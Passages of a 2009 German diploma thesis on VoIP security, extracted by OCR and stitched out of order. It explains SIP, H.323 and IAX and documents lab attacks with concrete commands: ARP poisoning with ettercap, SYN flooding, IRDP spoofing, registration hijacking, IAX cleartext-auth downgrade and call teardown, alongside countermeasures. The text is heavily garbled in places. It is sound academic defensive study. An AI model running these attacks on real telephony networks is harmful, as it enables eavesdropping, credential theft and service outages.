66. ber die bereits bestehende Verbindung ein Sahred Secret ausgetauscht um eine direkte Kommunikation zwischen den beiden Endpoints zu generieren Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 103 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 4 1 2 _Exemplarischer Verbindungsaufbau mit H 225 vereinfachte Darstellung Terminal H 323 Terminal H 323 GATEKEEPER H 225 SETUP H 225 CALL PROCEDING a H 225 ALERTING m H 225 CONNECT 7 Q Q lt H 225 RELEASE COMPLETE w lt w l w a Quelle Bild http www en voipforo com H323 H323_example php Beschreibung des exemplarischen Verbindungsaufbaus mit H 225 Endpoint A sendet ein H 225 SETUP direkt an den gew nschten Endpoint B mit dem er telefonieren will Endpoint B best tigt den Erhalt des Setups und quittiert mit H 225 CALL PROCEDING diesen zur ck zu Endpoint A Gleichzeitig beginnt Endpoint B zu klingeln und signalisiert dies mit H 225 ALERTING an den Endpoint A Mit dem Abheben des H rers sendet Endpoint B ein H 225 Connect zu Endpoint A die Verbindung steht und es k nnen die Nutzdaten via RTP RTCP ausgetauscht werden Der Endpoint welcher die Verbindung beendet sendet mit dem Auflegen des H rers ein H 225 RELEASE COMPLETE an die Gegenseite welche darauf die Verbindung auch abbaut Die obigen Informationen betreffend dem H 323 Protokoll sind
67. da diese selbst angegriffen werden k nnen Werden diese jedoch durch ein IDS System berwacht so werden die Angriffe fr hzeitig erkannt und abgewehrt 8 5 12 Massnahmen gegen SYN Flod Siehe oben Kapitel 8 5 11 8 5 13 Massnahmen gegen LAND Flood Siehe oben Kapitel 8 5 11 8 5 14 WLAN und VOIP Der Grundstein der VOIP Sicherheit liegt in der Netzwerksicherheit Nur mit einer sicheren Netzwerkinfrastruktur lassen sich darin VOIP Komponenten implementieren welche auch sicher sein sollen Zur Erh hung der Sicherheit sollte das Datennetz vom VOIP Netzwerk logisch getrennt werden Dies bringt nebst sicherheitsrelevanten Vorteilen auch noch eine Steigerung der Gespr chsqualit t QOS und eine bessere Managbarkeit des VOIP Netzes mit sich Eine Trennung der beiden Netze verringert die Angriffspunkte gegen das VOIP Netz erheblich Diese Trennung wird mittels VLAN Technologie im Layer 2 bewerkstelligt Dazu m ssen s mtliche Netzwerk Komponenten VLAN f hig sein Wichtig dabei ist folgendes zu Beachten Wenn als Terminals Softphones eingesetzt werden ist diese Trennung nicht m glich Beim Einsatz von Hardphones ist zu beachten dass VLAN seitens der Ger tehersteller auch wirklich unterst tzt wird VLAN bietet jedoch keinen Schutz wenn der Angreifer Zugang zum VLAN geschiitzten Port selbst hat Durch das Einstecken eines PC s oder Laptop s am selben Port befindet sich der Angreifer schon im entsprechenden VOIP VLAN und kann von dort aus
68. dass beim Leser des Diplomberichtes bereits ein Grundwissen in Richtung IP Netzwerke und VOIP Telefonie vorhanden ist Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 210 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 1 4 Definitionen und Abkiirzungen Abkiirzung Definition ARP Spoofing DHCP Rouge Server DHCP Starvation DoS Attacke H 323 IAX ICMP Redirect Integrit t IP Spoofing IRDP Spoofing LAND Flood MAC Flooding MAC Spoofing MGCP Megaco MitM Attacke PBX Ascotel Intelligate Erkl rung Senden von gef lschten ARP Paketen mit dem Ziel die ARP Tabellen im Netzwerk zu ver ndern dass danach der Datenverkehr zwischen 2 Terminals manipuliert oder abgeh rt werden kann An ein bestehendes Netzwerk wird verbotenerweise ein weiterer DHCP Server angeschlossen ber diesen Rouge Server k nnen s mtliche Parameter welche zuvor durch den echten DHCP Server vergeben wurden manipuliert werden Es k nnen dann DoS oder MitM Attacken ausgef hrt werden Angreifer t uscht DHCP Pakete vor kriegt s mtliche vom DHCP Server zu vergebenden IP Adressen und saugt so berechtigten Clients die IP Adressen ab Dadurch haben die Clients keine g ltigen IP Adressen mehr zur Verf gung und k nnen sich somit nicht mehr im Netz anmelden Dos Angriff Auch Denial of Service genannt und hat zum Ziel die Verf gbarkeit eines Services oder Ger tes einzuschr
69. de literat studie n VolP index htm S Sch r MAS 06 02 20 Seite 202 MitM Man in the Middle Nemesis Nmap Nonce Password Retrieval PBX PING Flood Portsacnner Protos Test Suite Proxy Server Q 931 Registration Reject Diplomarbeit VOIP Security Ein Man in the middle Angriff MITM Angriff auch Janusangriff nach dem doppelk pfigen lanus der r mischen Mythologie genannt ist eine Angriffsform die in Rechnernetzen ihre Anwendung findet Der Angreifer steht dabei entweder physikalisch oder heute meist logisch zwischen den beiden Kommunikationspartnern und hat dabei mit seinem System vollst ndige Kontrolle ber den Datenverkehr zwischen zwei oder mehreren Netzwerkteilnehmern und kann die Informationen nach Belieben einsehen und sogar manipulieren Die Janusk pfigkeit des Angreifers besteht darin dass er den Kommunikationspartnern das jeweilige Gegen ber vort uschen kann ohne dass sie es merken VOIP Angriffs Tool mit dem gespoofte IP Pakete versendet werden k nnen Nmap ist ein Werkzeug zum Scannen und Auswerten von Hosts in einem Computernetzwerk und f llt somit in die Kategorie der Portscanner Der Name steht f r Network Mapper In der Kryptographie wurde die Bezeichnung Nonce Abk rzung f r used only once 4 oder number used once 5 aufgegriffen um einzelne Zahlen oder eine Buchstabenkombination zu bezeichnen die ad hoc gew hlt und nach einmaliger Verwendung verwo
70. des Tools Schweregrad 1 leicht 6 schwer http www isecpartners com vnak html Hinweise zu Installation Verfiigbarkeit Installation Tool 5 Anwendung Tool 5 Vnak ist unter Linux Unix lauff hig und nicht in BackTrack3 enthalten Erforderliche Vorkenntnisse 5 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Will sich ein IAX Client bei seinem Asterisk Proxy Server registrieren sendet er einen Authentifizierungs Request an diesen Meistens wird zur Registrierung MD5 eingesetzt das heisst der Asterisk Proxy Server sendet dem IAX Client einem Challenge Nonce zur ck Ziel des Angreifers ist es vor dem Antworten des Asterisk Proxy Servers eine gespoofte Nachricht an den IAX Client zu senden Der Angreifer gibt sich in dieser Nachricht als Asterisk Proxy Server aus und teilt dem IAX Client mit dass als Authentifizierungs Methode das Passwort nur in Klartext Nachricht akzeptiert wird Daraufhin sendet der IAX Client seine Authentifizierungs daten in Klartext bers Netzwerk Ziel des Angreifers ist es an Passw rter und die dazugeh rigen Benutzerkonten zu kommen Einmal im Besitz dieser Angaben kann der Angreifer ein eignes Telefon mit den falschen Benutzerkonten an das Netzwerk anschliessen Dadurch wird die Registrierung des zuvor im Netzwerk vorhandenen originalen User Agents gel scht Alle ankommenden Anru
71. des User Agents 4111 zu l schen so dass dieser f r ankommende Gespr che nicht mehr erreichbar sein wird Bye Nachrichten werden in der Regel am Ende einer Gespr chsverbindung von demjenigen User Agent gesendet der das Gespr ch beendet also den H rer auflegt Solche Nachrichten k nnen jedoch auch von einem Angreifer gef lscht werden um zwei miteinender kommunizierende User Agents zu trennen Damit eine BYE Nachricht gespooft werden kann m ssen zuerst einige Informationen ber die bestehende Gespr chsverbindung und deren zwei teilnehmenden User Agents gesammelt werden Dies wird mit einem Netzwerkmonitor bewerkstelligt in diesem Beispiel wird Wireshark verwendet Es wird dazu die Initiierung des Gespr chsaufbaus INVITE Nachricht der zu trennenden Kommunikation bis hin zur Durchschaltung des Gespr ches ACK Nachricht des Angerufenen aufgezeichnet 2 11 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer beabsichtigt das Gespr ch zwischen den beiden User Agents 7111 und 7129 zu trennen In diesem Setup wurden andere interne Nummern f r die User Agents verwendet Zur bersicht bitte das Testumgebungs Setup in Kapitel 1 3 Konsultieren Damit der Angreifer die im Netzwerk ausgetauschten Nachrichten empfangen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Eine BYE Nachricht kann sowohl an einen SIP Proxy Server oder aber an einen User Agent
72. die Authentifizierung gesendet Eigentlich h tte zuvor aber die Registration Reject REGREJ Nachricht des Angreifers beim IAX Client eintreffen sollen Diese trifft aber erst mit Paket Nr 31 ein Dies ist jedoch zu sp t der Angriff ist dadurch misslungen denn der IAX Client hat zuvor schon mit Paket Nr 30 den MDS5 Hashwert den er aus Challenge und Passwort generiert hat an den Asterisk Proxy Server zur ckgesendet Das Paket Nr 31 wird somit ignoriert und verworfen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 98 oo Berner Fachhochschule teem Technik und Informatik Software Schule Schweiz Eile Edit View Go Capture Analyze Statistics Help Eilter Expression Clear Apply No Time Source Destination Protocol Info 25 9 290619 compalin_Ob ad 96 Broadcast ARP who has 10 1 1 1 Tell 10 1 1 241 26 9 290884 Netopia_21 79 14 lt compal n_0b ad 96 ARP 10 1 1 1 is at 00 0f cc 21 79 14 27 12 720463 Intelcor_07 f3 50 Broadcast ARP who has 10 1 1 71 Tell 10 1 1 151 Frame 31 79 bytes on wire 79 bytes captured Ethernet II src vmware_55 dd b4 00 0c 29 55 dd b4 DSt Intelcor_07 f3 50 00 1c c0 07 f3 50 amp Internet Protocol Src 10 1 1 101 10 1 1 101 DSt 10 1 1 151 10 1 1 151 User Datagram Protocol Src Port iax 4569 DSt Port iax 4569 G Inter Asterisk exchange v2 000 0000 0000 0001 Source call 1 000 0000 0000 0001 Destination call 1 Or csse ccce Tim
73. die IP Adresse des Angreifers eingetragen werden In untenstehendem Printscreen ist zu sehen dass die Argumenten wie Via Branch To From und Call ID von den zuvor via Wireshark ersnifften Daten eins zu eins bernommen wurden und in SiVus eingegeben wurden SIP Component Discovery SIP Scanner Utilities sip Help Message Generator Authentication Analysis p Conversation Log F REGISTER sip 10 1 1 101 SIPf2 0 Transport Called User Domain Host _ _ Port Via SIP 2 0 UDP DP N 10 1 1 101 soso 10 1 1 151 18262 branch z9hG4bK d8754z b77ba47e29442e7 1 1 d8754z 12 0 UDP 10 151 18262 Branch 3442e71 1 d87542 From bob lt sip 4119 10 1 1 101 gt tag 5e29673d bob lt sip 4119 10 1 1 101 gt To bob lt sip 4119 10 1 1 101 gt Sg 2 ee Call ID NmRHNGZiZmFmNDVINMEXMTI4Y2NjYTKOMDA4YjIhYTI 5 7 P From G SOs ige rda S Se29673d CSeq 1 REGISTER Authentication Contact lt sip 4115 10 1 1 241 gt Call ID NmRHNGZiZmFmNDVINmExMTI4Y2NiYTKOMDA Max_forwards 70 c R Fe User Agent X Lite release 1100 stamp 47546 e it REGISTER Content Type application sdp Contact lt sip 4115 10 1 1 241 gt Expires 3600 Record Route Content Length 0 Subject L E Content type application sdp User Agent Lite release 1 1001 stamp 47546 E Expires 3600 Max Forwards 70 rSIP Message ee a
74. einer HANGUP Nachricht des beendenden Terminals an die Gegenseite signalisiert welche den Empfang dieser Nachricht durch eine ACK Nachricht zur ck best tigt Die obigen Informationen betreffend dem IAX IAX2 Protokoll sind nicht abschliessend und vollumf nglich aufgef hrt Sie dienen jedoch dem besseren Verst ndnis um die in den n chsten Kapiteln aufgef hrten Angriffe begreifen und selbst nachvollziehen zu k nnen Tiefere und weiterf hrende Informationen ber das IAX IAX2 Protokoll sind unter folgenden Links erh ltlich http de wikipedia org wiki IAX http en wikipedia org wiki Inter Asterisk_eXchange https datatracker ietf org drafts draft guy iax Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 84 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 3 2 1 Enumeration JAX User Integritat ees an Vertraulichkeit x Eingesetztes Tool Verf gbarkeit enumIAX Downloadlink Quelle des Tools Schweregrad http sourceforge net projects enumiax 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten i Hinweise zu Installation Verf gbarkeit Installation Tool 4 Anwendung Tool 4 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 4 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenp
75. gehen von diesem Angriff aus 48 2 6 1 SIP Authentication Attack mit SIPcrack 49 2 6 2 Technik und Funktionsweise 50 2 6 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 50 2 6 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 52 2 7 1 Registration Hijacking mit SiVus 53 2 7 2 Technik und Funktionsweise 54 2 7 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 54 2 7 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 57 2 8 1 Registration Hijacking mit registrationhijacker 58 2 8 2 Technik und Funktionsweise 59 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 6 oe Berner Fachhochschule tems Technik und Informatik Software Schule Schweiz 2 8 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 59 2 8 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 60 2 9 1 Redirection Attack 61 2 9 2 Technik und Funktionsweise 62 2 9 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 62 2 9 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 64 2 10 1 Denial of Service Registration Remove 65 2 10 2 Technik und Funktionsweise 66 2 10 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 66 2 10 4 Folgende Au
76. gew nschten angerufenen User Agent respektive dem SIP Proxy Server mit auf welchem Port er erreichbar f r SIP Nachrichten ist Mit jedem Starten der Applikation X Lite wird diese ein beliebig anderes Port gt 1024 oberhalb der Well Known Ports f r SIP ausw hlen Untenstehend ist zu sehen dass der User Agent 4119 IP Adresse 10 1 1 151 zur Zeit das Port 18372 offen h lt um das Netzwerk nach SIP Nachrichten abzuhorchen Capture Analyze Statistics Help Destination Protocol Info Ethernet II Src Intelcor_07 f3 50 00 1C c0 07 f3 50 ost Dell_f0 22 43 00 14 22 f0 22 43 3 Internet Protocol Src 10 1 1 151 10 1 1 151 Ost 10 1 1 101 10 1 1 101 User Datagram Protocol Src Port 18372 18372 ost Port sip 5060 Source port 18372 18372 Destination port sip 5060 Length 1206 4 Checksum 0x1063 correct Session Initiation Protocol a Request Line INVITE sip 4111 10 1 1 101 SIP 2 0 Message Header 4 Message Body Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 79 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Sobald dieses Port in Erfahrung gebracht wurde kann mit dem Angriff begonnen werden Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet java jar c07 sip r2 jar touri 4119 10 1 1 101 fromuri 4999 10 1 1 101 teardown sendto 10 1 1 151 delay 1000 dport 18372 validcase start 1
77. gt Berner Fachhochschule Technik und Informatik Software Schule Schweiz S Sch r MAS 06 02 20 Seite 220 a 4 6 Zeitplan SET gE1 02 BL Wl 6E OOT ne gogz enuga J gogz senuer gogz saquiezaq gogz Jagwanony Booz aqoa 60 Z0 07 60 Z0 61 60 20 61 80 010 60 20 02 80 0T 20 60 20 TZ 60 20 02 60 20 02 60 20 6t 60 20 81 60 20 ST 60 20 T2 60 20 ST 60 Z0 Z0 60 10 S SbERpsIonsbunsg ayeynsey Gunyewegs EINE EN TE ION 24ubuy 9 ashpuy Bungebunysa neqyny 60 T0 b2 60 10 bO 60 T0 E0 80 ZT S0 80 ZT S0 80 ZT 10 60 20 20 80 ZT 10 80 21 60 80 2T 80 80 C1 0 80 TT 92 BO TT S 80 TT ST 80 C1 60 80 TT ST BO TT ST 80 TT bT 80 11 01 80 O1 61 80 0T 8T 80 0T 20 80 TT ST 90 0T 20 80 07 80 80 0T 20 UOQEWUASELd Bunyeveqionsuojeyuaseld Gpp puaquojdig aqebqy ungeneuyog uopeyuaunog E Oe ASE dd Bunasay Jenzugag dazucysbunvelsyeey aueugy spo Bern ayubuy dron ep uauyag Ydezuoysbunasjeay 50013 ayuBuyy apoyoyo4y usang asheuewagig EET palud e T 19 02 2009 Diplomarbeit VOIP Security oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 4 7 Projektrisiken Risiko Faktor Auswirkung Massnahmen Personenausfall Hoch Hoch Gute Planung und Koordination Krankheit Milit r Beruf Betreuer oder Experte Mittel Mittel Einbringen der nderungen w nscht nderung Hardware Ausfall Mittel Tief Hardware redund
78. http SYN Seq 0 win 65535 Len 0 11063 15 046040 10 1 1 101 252 41 TCP nttp gt hermes RST ACK Seg 1 Ack 1 Win 0 Len 0 11064 15 046095 145 70 34 170 101 TCP dbcontrol oms gt http SYN Seq 0 win 65535 Len 0 11065 15 046103 10 1 1 101 34 170 TCP wtp gt dbcontrol oms RST ACK 0 1106 56 40 214 131 TCP isoipsigport i gt http SYN Seg a 67 10 1 1 101 TCP http gt Isoipsigport RST CK A 11068 3 164 252 68 101 TCP cardax gt http SYN Seq 0 win 65535 Len 0 11069 15 046 10 1 1 101 A TCP ttp gt cardax RST ACK Seg 1 Ack 1 win 0 Len 0 11070 15 184 191 63 74 10 1 1 101 TCP netuitive gt http SYN Seq 0 win 65535 Len 0 11071 15 10 1 1 101 184 191 63 74 TCP attp gt netuitive RST ACK Seg 1 Ack 1 Win 0 Len 34 65 163 31 10 1 1 101 TCP resacommunity gt http SYN Seq 0 win 65535 Len 0 10 1 1 101 34 65 163 31 TCP ttp gt resacommunity RST ACK Seg 1 Ack 1 Win 0 247 249 176 26 10 1 1 101 TCP lupa gt http SYN Seq 0 win 65535 Len 0 231 219 68 190 10idr1 A TCP fuscript gt http SYN Seq 0 win 65535 Len 0 42 3 121 110 10 1 1 101 TCP c1222 acse gt http SYN Seq 0 win 65535 Len 0 046581 10 1 1 101 42 3 121 110 TCP http gt cl222 acse RST ACK Seq 1 Ack 1 win 0 Le NARTAN ot JF on 444 tN 1m Ten wean n heten Powel Can N wits mh ERRIRE Ean N 4 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 174 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Im Verlaufe des An
79. iSEC RTCP BYE DOS Downloadlink Quelle des Tools Schweregrad http www isecpartners com rtp_injection_files html 1 leicht 6 schwer Nemesis ist in BackTrack3 enthalten Hinweise zu Installation Verfiigbarkeit Installation Tool 4 Anwendung Tool 5 Nemesis ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 5 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 iSEC RTCP BYE DOS ist ein vordefiniertes IP Paket welches mit Hilfe Gefahrenpotential von nemesis zum Angriffsziel gesendet wird 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Dieser Angriff zielt auf die Verf gbarkeit der Sprachkan le ab Der Angreifer sendet einem Endger t oder dem VOIP Server welches welcher sich in einer aktuellen Verbindung befindet eine gespoofte RTCP BYE Nachricht Das Angriffsziel geht davon aus dass die Gegenseite mit der es sich in einem Gespr ch befindet das Gespr ch beendet hat und schliesst darauf hin die aktuelle Session Schutz gegen Angriff Analyse Siehe Massnahmen SRTP Kapitel 8 4 1 Siehe Massnahmen Tunneln mit IPSec Kapitel 8 4 2 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Trotz korrekter gespoofter RTCP BYE Nachrichten gelang es im Rahmen dieser Diplomarbeit nicht ein aktives Gespr ch zweier User Agents zu trennen Es wurde Kontakt zum Entwickler dieses Tools aufgenommen jedoch bl
80. in logfileARPPoisoning pcap Bem 1 gtk Toolkit erstellt graphische Benutzerschnittstelle Bem 1 Dieses Logfile kann nach erfolgreichem Angriff mittels Wireshark ge ffnet werden Shell Konsole ettercap w logfileARPPoisoningfpcap gtk Nach dem Starten von Ettercap ist als erstes das Netzwerkinterface auszuw hlen ber welches der Angriff erfolgen soll gt gt Sniff gt gt Unified sniffing situa Options Help LS Unified sniffing Shift uU G Bridged sniffing Shift B 3 lt Set pcap filter Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 135 eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz im Rollbalken ist das gew nschte Netzwerkinterface auszuw hlen Options Help ettercap input a2 Network interface etno 4P OK 2 Cancel Als n chstes wird das Netzwerk nach potentiellen Angriffszielen gescannt gt gt Hosts gt gt Scan for hosts Es ist auch m glich eine Liste mit Hosts zu importieren welche als Angriffsziele in Frage kommen und eventuell zuvor schon einmal mittels der Scan Funktion gefunden wurden wiew Mitm Filters A Hosts list H B Scan for hosts ctri s amp Load from file Ctri O GJ Save to file Ctri S Start Plugins Help Logging Targets Hosts view Mit mN Filters Logging Plugins Help 39 protocol dissectors 53 p
81. infolge der gespooften und nichtexistierenden IP Adressen welche der Angreifer benutzt bleiben die jeweiligen halboffenen Verbindungen auf dem Server bis zur maximalen Wartezeit bestehen Erst nach Ablauf der maximalen Wartezeit schliesst der Server die halboffenen Verbindungen Mit der enormen Vielzahl der vom Angreifer aus gesendeten SYN Anfragen wird der Server sehr schnell infolge der wartenden halboffenen Verbindungen an die Grenzen seiner Performance stossen Systemabsturz oder Nichterreichbarkeit sind die Folge dieses Angriffes DoS Denial of Service SYN Anfragen k nnen auf ein offenes Port gemacht werden Auf vielen der VOIP Server ist auch ein IIS Microsoft Internet Information service installiert welcher auf Port 80 h rt und somit zum Angriff bestens geeignet ist 6 11 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer beabsichtigt den Asterisk Proxy Server mittels synflood anzugreifen Im Terminalfenster von BackTrack 3 wird synflood c gestartet und der Angriff mit folgenden Argumenten ausgef hrt synflood 10 1 1 101 80 Die Werte im Einzelnen stehen wie folgt f r synflood Aufruf Programm 10 1 1 101 Angriffsziel 80 Port an welches die SYN Pakete gesendet werden sollen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 173 Berner Fachhochschule Technik und Informatik Software Schule Schweiz Shell Konsole synflood 10 1 1 101 80 SYN flooder by znet
82. ist oftmals durch eine Authentifizierung des User Agents gesichert damit sich nur authentisierte User anmelden k nnen Dabei wird ein Challenge Response Verfahren eingesetzt den User Agent also ein Nonce Value gesendet mit dem er den MDS Hashwert bildet Proxy Server Ein Proxy Server leitet Anfragen von und zu den User Agents weiter Proxy Server k nnen auch Aufgaben wie Routing und Authentifizierung bernehmen Redirect Server Der Redirect Server wird anstelle eines Proxy Servers eingesetzt Dieser hat die Aufgabe dem Initiator eines Verbindungsaufbaus die IP Adresse des gew nschten Gespr chspartners mitzuteilen 2 1 2 SIP Nachrichten Untenstehend aufgef hrte SIP Requests sind die am meisten vorkommenden Nachrichten welche w hrend einem Verbindungsauf und Abbau vorkommen k nnen Es gibt noch weitere Nachrichten welche jedoch im Rahmen dieser Diplomarbeit nicht behandelt und deshalb hier nicht aufgef hrt werden Diese Nachrichten k nnen einzeln oder als Folge Response Antwort eines zuvor bertragenen SIP Dialoges auftreten Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 27 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz INVITE Eine VOIP Verbindungs Anfrage wird zu einem User Agent gesendet um ihn in eine Verbindung einzuladen Dieser Request wird von einem User Agent generiert dann via Registrar Redirect Server oder Proxy Server zum gew nschten
83. mit Router Advertisement und Router Solicitation Nachrichten In regelm ssigen Zeitabst nden sendet der Router eine Router Advertisement Nachricht um den Hosts mitzuteilen dass er der Default Gateway ist Startet ein Rechner neu auf so sendet dieser Router Solicitation Nachrichten ins Netzwerk und erfragt so den aktuellen Default Gateway Sendet der Angreifer nun gef lschte IRDP Nachrichten ins Netzwerk kann er die bei den Hosts eingetragenen Default Gateways und somit auch die Route der Datenpakete ndern Das Tool irdpresponder h rt ebenfalls das Netzwerk nach Router Solicitation Nachrichten ab mit welchen aufstartende Rechner nach dem Gateway im Netzwerk fragen Detektiert das Tool eine solche Router Solicitation Nachricht eines Hosts sendet es dem Fragen Host sofort eine Mobile IP Advertisement Nachricht worin es dem Host die falsche IP Adresse des Gateways mitteilt 6 8 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer stellt einen eigenen Gateway mit der IP Adresse 10 1 1 2 inklusive Internetzugang ins Netzwerk Sein Ziel ist es s mtlichen Sprach und Datenverkehr der ins Internet geroutet werden muss ber diesen Gateway umzuleiten um dabei mittels Netzwerkmonitor den ganzen Sprach und Datenstrom aufzuzeichnen Im Terminalfenster von BackTrack 3 wird irdpresponder gestartet und der Angriff mit folgenden Argumenten aufgerufen irdpresponder v i ethO S 10 1
84. nicht abschliessend und vollumf nglich aufgef hrt Sie dienen jedoch dem besseren Verst ndnis um die in den n chsten Kapiteln aufgef hrten Angriffe begreifen und selbst nachvollziehen zu k nnen Tiefere und weiterf hrende Informationen ber das H 323 Protokoll sind unter folgenden Links erh ltlich http www h323forum org http de wikipedia org wiki H 323 http www en voipforo com H323 H323_components php http www itu int rec T REC H 323 e Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 104 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 4 2 1 Enumeration H 323 User amp Server Integrit t RESTE RE Vertraulichkeit x Eingesetztes Tool Verf gbarkeit nmap Downloadlink Quelle des Tools Schweregrad http insecure org nmap 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten i Hinweise zu Installation Verf gbarkeit Installation Tool 3 Anwendung Tool 4 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 4 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 2 Ziel Angriff Analyse Bei der Enumeration geht es dem Angreifer darum im ganzen Ziel Netzwerk so viele Informationen ber die an
85. nicht mehr erreichbar daf r w rde der Angreifer die Datenpakete des urspr nglichen Ger tes erhalten Die eingeschaltete Limitierung w rde im Falle des Eintritts einer gleichen MAC Adresse den Port sperren und eine Meldung an den Systemadministrator absetzen Eine weitere M glichkeit bietet die 802 1x Authentifizierung Dabei meldet sich das Endger t mittels Authentifizierung bei einem Radiusserver an worauf nach erfolgreicher Authentifizierung der Switchport erst dann f r den Datenverkehr freigegeben wird 8 5 3 Massnahmen gegen DHCP Angriffe Um DHCP Starvation zu verhindern muss auf dem Switch die Zuordnung der IP Adressen zu den jeweiligen Fest konfiguriert werden Ebenfalls ist eine Limite zu setzen welche die maximalen erlaubten DHCP Anfragen pro Port berwacht Wird diese Limite berschritten wird der Port deaktiviert und eine Meldung an den Systemadministrator gesendet Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 191 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 8 5 4 Massnahmen gegen STP Angriffe Neuere Switche berwachen die Herkunft der STP Nachrichten 8 5 5 Massnahmen gegen Spoofing ACL Listen verhindern dass externe Angreifer IP Adressen aus dem internen IP Adressbereich verwenden k nnen 8 5 6 Massnahmen gegen VLAN Angriffe Keine Ports auf den Switches im Auto Trunking Modus stehen lassen Ein Angreifer kann eine gespoofte VTP VLAN Trunk
86. nken respektive zu verhindern ITU T Standard Zusammenfassung verschiedener Signalisierungsprotokolle f r den Verbindungsauf und abbau von Sprachverbindungen ber IP InterAsterisk eXchange Protokoll f r die Verbindung zwischen Asterisk Servern und zu Endger ten propriet res Protokoll Mittels ICMP Redirect wird die Route der IP Pakete ge ndert Somit kann der Angreifer s mtlichen Datenverkehr ber seinen eigenen Rechner umleiten und kann diesen abh ren manipulieren nach Passw rtern und Login Namen durchsuchen ICMP Nachrichten werden dazu benutzt um Router ber bessere Routen zu informieren Die Tatsache dass die empfangenen mit den gesendeten Daten absolut identisch sind Gef lschte IP Adresse verwenden um Zugang zu Server oder Netzwerk zu erhalten zB durch Paketfilter oder Firewall hindurch um dann in diesem gesch tzten Bereich an Informationen heran zu kommen oder weitere Angriffe zu starten Endsystemen wird mit IRDP ICMP Router Discovery Protocol die IP Adresse des im Netz zust ndigen Gateways mitgeteilt Gef lschte IRDP Pakete berschreiben den Default Gateway Eintrag bei den Zielobjekten So kann der gesamte Datenstrom umgeleitet mitgeschnitten oder manipuliert werden Durch einen IRDP Angriff k nnen alle VOIP Komponenten auf einmal in ihrer Funktion gest rt werden DoS Angriff Bei LAND Flood werden TCP Verbindungsaufbaupakete an ein Ziel gesendet bei dem Quell IP und Quell Port sowie Ziel IP und Ziel
87. seine E E A Fehler Textmarke nicht definiert 2 2 Soll ara Fehler Textmarke nicht definiert 23 Kannziele ss ee Fehler Textmarke nicht definiert 2A POL ONLI een ute tad aan Fehler Textmarke nicht definiert 2 5 Projekt Dokumentation u220sssesnnesneeneenneenennn Fehler Textmarke nicht definiert 3 Einsatz Hardware Test Analyse und Angrifftools Fehler Textmarke nicht definiert 3 ARC Wat eG sense leer Fehler Textmarke nicht definiert 3 2 Software und Tools u a aan Fehler Textmarke nicht definiert 4 Projektmanagement suuesserseensenneessnesnennnenneenenne Fehler Textmarke nicht definiert 4 1 Projektorganisalion nee Fehler Textmarke nicht definiert 42 IPE Oe Ret StU UT ne ai Fehler Textmarke nicht definiert 4 3 Arbeitszeiten aeg Fehler Textmarke nicht definiert 4 4 Sitzungen Besprechungen nen Fehler Textmarke nicht definiert 4 5 Milesiones lan Fehler Textmarke nicht definiert 26 Zeiplan seele Fehler Textmarke nicht definiert 4 7 Projektrisiken ns erleiden Fehler Textmarke nicht definiert 5 Bewertung cn een ER EKS Fehler Textmarke nicht definiert 6 Abnahme aa este mann Fehler Textmarke nicht definiert Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 209 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 1 Einleitung 1 1 Ausgangslage und Umfeld VOIP hat sich in den letzten Jahren am Markt immer 